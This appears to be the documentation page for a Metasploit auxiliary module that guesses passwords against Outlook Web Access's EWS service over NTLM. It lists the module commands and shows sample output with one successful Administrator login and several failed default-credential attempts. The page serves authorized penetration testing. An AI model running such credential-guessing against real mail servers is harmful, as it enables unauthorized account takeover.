Owa Ews Login - Metasploit Framework

This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. It is typically faster than the traditional form-based OWA login method.

Verification Steps

Do: use auxiliary/scanner/http/owa_ews_login
Do: set RHOSTS [IP]
Set TARGETURI if necessary.
Do: run

Scenarios

msf auxiliary(owa_ews_login) > run

[+] Found NTLM service at /ews/ for domain OWAMSF.
[+] OWA_EWS - Successful login: Administrator:monkey
[-] OWA_EWS - Failed login: root:
[-] OWA_EWS - Failed login: admin:
[-] OWA_EWS - Failed login: guest:
[-] OWA_EWS - Failed login: root:root
[-] OWA_EWS - Failed login: root:password
[-] OWA_EWS - Failed login: root:1234